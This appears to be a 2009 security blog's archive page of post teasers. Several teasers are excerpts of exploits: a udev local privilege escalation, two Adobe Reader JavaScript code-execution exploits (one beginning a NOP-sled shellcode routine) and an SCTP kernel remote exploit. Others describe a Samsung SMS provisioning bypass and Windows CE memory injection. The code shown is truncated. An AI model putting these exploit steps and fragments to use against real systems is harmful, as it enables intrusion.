Articles from April 2009

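[Pinned] Windows Mobile Development Tools and Resource Downloads

I have noticed that people often want to learn Windows Mobile development and experience the fun of mobile development, but do not know where to download the various development tools and learning materials. So I put together a list containing download links for each version of the Windows Mobile SDK, .NET Compact Framework, SQL Server CE, Device Emulator, Emulator Images and learning materials.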

 

» Read more

Tags: windows mobile, smartphone

Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit

 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].

» Read more

Tags: linux, exploit, vulnerability

Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit

//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//
//Steps:
//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)
//- attach the following script to the OpenAction of the pdf.

» Read more

Tags: adobe, exploit, execution

Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit

//##############
//Exploit made by Arr1val
//Proved in adobe 9.1 and adobe 8.1.4 on linux
//##############

var memory;
function New_Script()
{
    var nop = unescape("%u9090%u9090");
var shellcode =

» Read more

Tags: adobe, exploit, execution

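Samsung M8800 Innov8 and SGH-J750 Phones SMS Provisioning Message Authentication Bypass Vulnerability

The M8800 Innov8 and SGH-J750 phones do not show the user the source of a provisioning message; they accept unauthenticated SMS provisioning messages whose body contains no SEC and MAC parameters; and even when they accept authenticated SMS provisioning messages whose body does contain the SEC and MAC parameters, they perform no security checks on those parameters. A remote attacker who sends provisioning messages of these types could pose as a legitimate source and trick the user into installing a malicious configuration.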

» Read more

Tags: anycall, samsung

Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit

/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption
 * Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit
 *
 * coded by: sgrakkyu <at> antifork.org
 * http://kernelbof.blogspot.com
 *
 *
 * NOTE: you need at least one sctp application bound on the target box
 *
 * Supported target:
 * Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
 * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
 * Ubuntu 8.10 x86_64 (2.6.27_7-10 generic/server)
 * Fedora Core 10 x86_64 (default installed kernel)
 * OpenSuse 11.1 x86_64  (default installed kernel)

» Read more

Tags: exploit, linux, latest vulnerabilities

war3 Latest Vulnerability

So, does anyone know enough about jass byte code to answer this question:
What's on average the size a map's compiled bytecode takes? - This is very important to know for me...

» Read more

Tags: war3, vulnerability

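How Cross-Process Memory Injection Works on Windows CE

The Windows CE memory layout sets aside a memory region called slot0. This region is occupied by the currently executing process, and in any given time slice only one process can occupy it. When a process is due to run, the system does not directly execute the code at the memory location where the process resides; instead it copies the process's executable code into slot0 and executes that copy. In other words, while a process is executing, memory holds two identical versions of its code: the process code currently executing in slot0 and the code in the memory where the process itself resides.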

» Read more

Tags: windows ce, injection
